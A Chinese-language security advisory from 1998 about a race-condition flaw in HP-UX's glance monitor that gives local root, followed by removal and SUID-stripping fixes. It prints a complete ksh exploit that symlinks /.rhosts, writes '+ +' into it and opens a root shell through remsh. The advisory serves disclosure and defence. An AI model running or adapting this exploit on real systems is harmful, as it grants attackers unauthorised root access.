HP-UX 的/usr/perf/bin/glance存在安全漏洞发布时间:1998-01-20 更新时间:1998-01-20 严重程度:高 威胁程度:本地管理员权限 错误类型:竞争条件 利用方式:服务器模式 受影响系统 HP-UX详细描述 /usr/perf/bin/glance存在安全漏洞.Glance Plus是一个运行状态监视程序. 测试代码 #!/bin/ksh # exploit to work against the latest rev that I know of for glance+ # Tested on 9000/700.. Don't even know if it's available on 10.X if [ ! -x /usr/perf/bin/glance ] then echo 'No diablo programme.' echo 'Que si como es que.' exit fi PATH=/usr/perf/bin:/bin:/usr/bin:$PATH echo 'Please wait for about 10 seconds, or somewhere around that, anyway.' sleep 3 cp /.rhosts /tmp/rhosts-save ln -s /.rhosts ~/glance.err glance -j 1 -f ';><:/?*&^${KILLME}' - iterations 1 -maxpages 1 echo '+ +' > /.rhosts if [ -f /tmp/rhosts-save ] then cat /tmp/rhosts-save >> /.rhosts rm /tmp/rhosts-save fi #rm ~/glance.err # This goes away? Why does this go away? chmod 666 /.rhosts chown root /.rhosts remsh localhost -l root /bin/ksh -i 解决方案 在多个HP-UX系统安装中是作为演示程序或者独立购买。如果你不需要程序,你可以去掉在/usr/perf下的所有文件。 如果你要坚持使用此信息包,就控制目录访问权限, 并且去掉相应的SUID位。 相关信息 |
